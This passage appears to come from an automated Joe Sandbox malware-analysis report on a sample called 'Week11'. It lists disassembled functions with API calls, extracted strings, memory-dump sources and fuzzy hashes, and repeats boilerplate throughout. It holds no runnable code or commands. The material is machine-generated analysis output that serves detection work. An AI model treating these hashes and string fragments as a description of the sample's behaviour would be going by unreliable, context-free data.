                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 29590a81b3251fca5755b7757f13a5cb89c93322baddac7ebbf6560387a82461
                                • Instruction ID: 6cab1a8e8fef37a9c9f4059041024890a40a3f1f8d344ed13e853b53ff9a7377
                                • Opcode Fuzzy Hash: 29590a81b3251fca5755b7757f13a5cb89c93322baddac7ebbf6560387a82461
                                • Instruction Fuzzy Hash: C8F0313150010EBBDF017F71DC0C9AF3B6DAB90394B048926F91595160EB38DA96EB99
                                Function 0044AA07 Relevance: 4.1, Strings: 3, Instructions: 334COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: date$logs$path
                                • API String ID: 0-3116124417
                                • Opcode ID: 133996de80c348e9e78970d64dc1b6be4ecb56c10107aac29467756af1daac31
                                • Instruction ID: 9328a4e24000ddc87a463375ed416296aa69c017df2c73b6a2e59af4a77eedd7
                                • Opcode Fuzzy Hash: 133996de80c348e9e78970d64dc1b6be4ecb56c10107aac29467756af1daac31
                                • Instruction Fuzzy Hash: D9E16B75D002588FEB08CF95C8846DDBBB2FF85304F2981AEC50A6B356D774AA49CB91
                                Function 0044AA09 Relevance: 4.1, Strings: 3, Instructions: 334COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: date$logs$path
                                • API String ID: 0-3116124417
                                • Opcode ID: ec7cae6e4f198182df5be47fd8c01c696eba71d10eca4738416a41d04dbed728
                                • Instruction ID: 9e8fb5e346565543a85397cbcd1c4803d80c2448331f02fea9e916978b3e101d
                                • Opcode Fuzzy Hash: ec7cae6e4f198182df5be47fd8c01c696eba71d10eca4738416a41d04dbed728
                                • Instruction Fuzzy Hash: D2E16B75D00258CFDB08CF95C8846DDBBB2FF85304F2981AEC50A6B356D774AA49CB91
                                Function 004AA320 Relevance: 3.9, Strings: 3, Instructions: 110COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: %s:%08x$GenuineIntel$GenuineIotel
                                • API String ID: 0-2468691418
                                • Opcode ID: 5e00549dddc417758d175cd5b247fcdac5164947a460c6fc2e8f035a4589b6d0
                                • Instruction ID: ef081f72bb4cdc7e24380d7e12c50f566dd41fe1eeb303efa9d2195161100e9f
                                • Opcode Fuzzy Hash: 5e00549dddc417758d175cd5b247fcdac5164947a460c6fc2e8f035a4589b6d0
                                • Instruction Fuzzy Hash: D7419271D142499FCB11CFB8C8807EEBBB5EF6A310F14816AE815A7341E7388905CB65
                                Function 0046C990 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(?,00000001,0046E219,?,1D1D1D8C,00000000,?,00000001), ref: 0046C9AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: FileFindFirst
                                • String ID: \\?\
                                • API String ID: 1974802433-4282027825
                                • Opcode ID: f493e3ec0c0365d601dda9286fa5ac785f5688808302581b2e02ab17960157f2
                                • Instruction ID: 466355a01e7b825cad4fd529a01952e2af831e9010863f6ae6310193d666d26a
                                • Opcode Fuzzy Hash: f493e3ec0c0365d601dda9286fa5ac785f5688808302581b2e02ab17960157f2
                                • Instruction Fuzzy Hash: 69F09AB56006049F8340CB6DDC85D52B3A8EF8A37532883A9E918DB3A1E635AD00CBA4
                                Function 00418999 Relevance: 1.6, Strings: 1, Instructions: 346COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: V
                                • API String ID: 0-433605988
                                • Opcode ID: 76ae3eb703a0602a373f911ac9ad378478f18b5eb0beb1f91b32f166f295b47f
                                • Instruction ID: f8b6643259fef2ad4008a7e23513e40020b8eba216ea984c77515ec0901e6f35
                                • Opcode Fuzzy Hash: 76ae3eb703a0602a373f911ac9ad378478f18b5eb0beb1f91b32f166f295b47f
                                • Instruction Fuzzy Hash: 02E19CB1D056288FEB24CB14CC90BEABBB5EB85311F1441EED84967241DB386EC5CF96
                                Function 00444920 Relevance: 1.5, APIs: 1, Instructions: 38comCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.OLE32(004BC810,00000000,00000001,004C1AFC,?), ref: 0044494F
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: CreateInstance
                                • String ID:
                                • API String ID: 542301482-0
                                • Opcode ID: 167c21f9170c61d7dec070417aeb6f320e46ac321cfd58e7a502725eb0feb4d1
                                • Instruction ID: a6a9f9cc77d7f0a07212dedea549499c41f8e574d5345a7dc29d12e512f086a5
                                • Opcode Fuzzy Hash: 167c21f9170c61d7dec070417aeb6f320e46ac321cfd58e7a502725eb0feb4d1
                                • Instruction Fuzzy Hash: DCF054B7300210ABD7219E5B9C80E43BBA9EBDD774720452EF74897301DA769812D6A8
                                Function 004208F8 Relevance: 1.5, Strings: 1, Instructions: 262COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID: 0-399585960
                                • Opcode ID: 139206d703244f9fdc49eadf388b9c3a653b4028f4d110e69bb6445f7a5dc39b
                                • Instruction ID: 5b645a497636a1de9e600b3b5c69b1be11d8b58e577e9b1f5a9b0be0442f5a63
                                • Opcode Fuzzy Hash: 139206d703244f9fdc49eadf388b9c3a653b4028f4d110e69bb6445f7a5dc39b
                                • Instruction Fuzzy Hash: A49106B1E042649FE7248B10EC847EB77B5FF90314F5042FAD84E96681E7785EC1CA52
                                Function 004147B3 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: common
                                • API String ID: 0-3857477713
                                • Opcode ID: 5e3db6c1ffe91f925c0d071068069ee6e45b47405032df368c17bf1e641662f8
                                • Instruction ID: aa216b8fcc850d54d0ab7be48bb563fab11601ef7d8982119b17cbbd1da7f8bb
                                • Opcode Fuzzy Hash: 5e3db6c1ffe91f925c0d071068069ee6e45b47405032df368c17bf1e641662f8
                                • Instruction Fuzzy Hash: 097106B2E041249AEB288B14DD80BFB7775EB95310F1081BBE90E67684D67C5EC1CF5A
                                Function 004188C3 Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: V
                                • API String ID: 0-433605988
                                • Opcode ID: 5071269b6bab0c1dd79dce42214ce1a512198e3082085af673664af89407d0fc
                                • Instruction ID: 7a46a623c87d46e109ed50a76d6406abedb79d86b8dfed5f3f66fb4403ed09e7
                                • Opcode Fuzzy Hash: 5071269b6bab0c1dd79dce42214ce1a512198e3082085af673664af89407d0fc
                                • Instruction Fuzzy Hash: E761E3B1D046189BE7208B25DC84BFB7775EB84304F1081FEE90D66680EB385EC6CA57
                                Function 004186DD Relevance: 1.4, Strings: 1, Instructions: 185COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: V
                                • API String ID: 0-433605988
                                • Opcode ID: 757e9ff5c1567e5dfd3476e236039163917a94c3fc185f2058f417f68cb6e385
                                • Instruction ID: 54797916e3dc882b79422f10399017d7d6943fd4398b5e3f05ddd5512805ceb3
                                • Opcode Fuzzy Hash: 757e9ff5c1567e5dfd3476e236039163917a94c3fc185f2058f417f68cb6e385
                                • Instruction Fuzzy Hash: 9A61E6B1D046289AE7208B25DC84BFB7775EB84315F1081FEE90D66680EB7C4EC6CE56
                                Function 0041C7A7 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: _R
                                • API String ID: 0-1717569336
                                • Opcode ID: 6a899950d644ea6c2f1223bfce1993f84289e9e169b9015a73e9daa37bf58242
                                • Instruction ID: 33cc46f2cd2d5a11e31b00db56349fe57dfa520c6097e1a64061c56b9414d117
                                • Opcode Fuzzy Hash: 6a899950d644ea6c2f1223bfce1993f84289e9e169b9015a73e9daa37bf58242
                                • Instruction Fuzzy Hash: D461DFB19542558AEB649B20DC80BEAB3B5EF94300F1091FAD44D97690EB794FC2CF1A
                                Function 004AAAB0 Relevance: .6, Instructions: 637COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 390dfdf4b9ea32333300fc9057e662f8209510aa40f045774bdb22c753d4746b
                                • Instruction ID: 2f5bd20dfdf8811118756d311ad70a8170244ae597dc099000ab618d47d0b37e
                                • Opcode Fuzzy Hash: 390dfdf4b9ea32333300fc9057e662f8209510aa40f045774bdb22c753d4746b
                                • Instruction Fuzzy Hash: 9532F5B7A583194FC70CCE85DC805A5B3E2FBD8304B0E597D9959D7316EBB4EA098AC0
                                Function 004784C0 Relevance: .6, Instructions: 583COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a96658aefed841e4bd1c4b03aa5248894c2a3c5282d08f0adfd1d647e6ad7330
                                • Instruction ID: 57ecc883dded93a6826be8cd0c8434ba9d8dd7aeb52d8098ae97e57450000a07
                                • Opcode Fuzzy Hash: a96658aefed841e4bd1c4b03aa5248894c2a3c5282d08f0adfd1d647e6ad7330
                                • Instruction Fuzzy Hash: 0812C5BBB983194FDB48CEE5DCC169573E1FB98304F09A43C9A55C7306F6E8AA094790
                                Function 00402500 Relevance: .3, Instructions: 257COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Exception@8Throwstd::exception::exception
                                • String ID:
                                • API String ID: 3728558374-0
                                • Opcode ID: 633ee63756c80194708ffb94b0149ee78c3c90c548190b0d43f5b3b72c9c1deb
                                • Instruction ID: 3677c2a4413e502bcac265b81ae0569689aa7f27a1f6e73044c802614a20508c
                                • Opcode Fuzzy Hash: 633ee63756c80194708ffb94b0149ee78c3c90c548190b0d43f5b3b72c9c1deb
                                • Instruction Fuzzy Hash: A8A1A872E002199BCB08DF58C99469EB7B5BF88304F14862EE815AF3C5D7B4AD05CB94
                                Function 00408A24 Relevance: .2, Instructions: 237COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 09003370ddbeac6d7f79fa62771aaa20b1e3ab036e2d477f646bb6f057d7b023
                                • Instruction ID: f063c57a0dabc482292aec8050cb7aba3f0ac2d34f54dfccecc4f6f3c4bfb5c3
                                • Opcode Fuzzy Hash: 09003370ddbeac6d7f79fa62771aaa20b1e3ab036e2d477f646bb6f057d7b023
                                • Instruction Fuzzy Hash: A781D1B2D041258FE724CB24DD44AEBB775EF84310F1481FBD80DAB680D6399EC68E56
                                Function 0041CB42 Relevance: .2, Instructions: 158COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 48b3ec8c2da1c2ba6ddd785a76651a82fcb7268475b1e6cfec299b236dba2d9b
                                • Instruction ID: 5aa9bfe6c0129411dfd979f7adbfdfd8ca4fb0f5d10ad7d50539a2866b8f6e3a
                                • Opcode Fuzzy Hash: 48b3ec8c2da1c2ba6ddd785a76651a82fcb7268475b1e6cfec299b236dba2d9b
                                • Instruction Fuzzy Hash: F751D471D4416A8ADB208B25DC817FA77B1EF84315F1480FBD81EA6280E6785EC2DF59
                                Function 00414893 Relevance: .2, Instructions: 157COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
